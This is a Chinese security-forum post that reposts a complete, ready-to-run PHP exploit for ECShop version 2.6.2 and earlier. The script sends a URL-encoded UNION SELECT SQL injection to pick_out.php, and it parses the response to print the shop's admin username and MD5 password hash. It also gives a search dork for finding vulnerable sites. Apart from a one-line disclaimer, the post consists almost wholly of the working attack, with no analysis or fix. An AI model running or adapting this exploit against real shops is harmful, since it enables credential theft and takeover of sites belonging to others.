- 帖子
- 212
- 主题
- 189
- 精华
- 0
- 积分
- 1452
- 贡献
- 1134
- 激情
- 1349
- 阅读权限
- 100
- 最后登录
- 2018-6-13
|
[Bug&安全&补丁] [ bug] ECShop <= v2.6.2 SQL injection / admin credentials
- #!/usr/bin/php
- <?php
- //本程序只作技术交流,请不要用做非法用途!!
- print_r('
- +---------------------------------------------------------------------------+
- ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit
- by puret_t
- mail: puretot at gmail dot com
- team: http://bbs.wolvez.org
- dork: "Powered by ECShop"
- +---------------------------------------------------------------------------+
- ');
- /**
- * works with magic_quotes_gpc = Off
- */
- if ($argc < 3) {
- print_r('
- +---------------------------------------------------------------------------+
- Usage: php '.$argv[0].' host path
- host: target server (ip/hostname)
- path: path to ecshop
- Example:
- php '.$argv[0].' localhost /ecshop/
- +---------------------------------------------------------------------------+
- ');
- exit;
- }
- error_reporting(7);
- ini_set('max_execution_time', 0);
- $host = $argv[1];
- $path = $argv[2];
- $resp = send();
- preg_match('#IN\s\(([\S]+):([a-z0-9]{32})\)#', $resp, $hash);
- if ($hash)
- exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");
- else
- exit("Exploit Failed!\n");
- function send()
- {[hide]
- global $host, $path;
- $cmd = 'cat_id=999999&attr[%27%20UNION%20SELECT%20CONCAT(user_name%2c0x3a%2cpassword)%20as%20goods_id%20FROM%20ecs_admin_user%20WHERE%20action_list%3d%27all%27%20LIMIT%201%23]=ryat';
- $data = "GET ".$path."pick_out.php?".$cmd." HTTP/1.1\r\n";
- $data .= "Host: $host\r\n";
- $data .= "Connection: Close\r\n\r\n";
- $fp = fsockopen($host, 80);
- fputs($fp, $data);
- $resp = '';
- while ($fp && !feof($fp))
- $resp .= fread($fp, 1024);
- return $resp;
- }
- ?>
复制代码 [/hide] |
|